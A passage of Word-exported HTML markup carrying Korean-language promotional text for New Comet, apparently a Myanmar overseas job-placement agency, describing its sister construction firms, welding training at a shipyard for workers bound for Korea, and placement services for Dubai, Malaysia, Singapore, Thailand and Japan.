style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 25</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">년</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">이상&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">종사해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">왔고 나라를 위한 정한 세금들을 냈습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">. </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">게다가</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">100 </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">명 이상의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">직원에게</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">고용</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">기회를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">제공했습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">또한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">쌍둥이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">회사인</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>뉴코멧건설 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>, </strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>제야슈웨삐띡 건설 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>, </strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>아웅네원 회사</strong>들은 정부</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">부처로부터</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">입찰&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">(tender)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">받고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">건설</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">작업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">동안</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 200</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">명</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">이상의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">직원에게</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">고용</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">기회를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">제공했습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">저희&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>뉴코멧</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>해외직업소개회사</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">는 현재에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">한국</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">조선소들에 일하고 싶은 미얀마</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">각지에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">온</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">소수민족</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">형제들을 교통통신부</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">산하</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">씬마락</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"> (Sinmalike)</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">조선소에 트레이너들와 함께 훌령한 기능공이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">되도록</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">용접수업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">제공하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">있으며</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">취업할 수 있게 취업들을 연계시키고 도와주고 있습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">또한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">두바이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">말레이시아</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">싱가포</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">태국</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">일본 같은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">국가에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">일하기를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">원하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">청년들에게</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">취업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">기회를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">받알 수 있도록&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">서비스들을 제공하고 있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">New Comet Trading Agency Co.ltd</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">미얀마의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">젊은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">치누들이 일본의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">개발한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">첨단</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">기술을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">배우고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">꿈을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">실현할</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">수</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">있도록</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">필요한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">교육을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">제공하고 돕고 있습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">일본으로 취업비자</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">연수비자로 가기</span><span 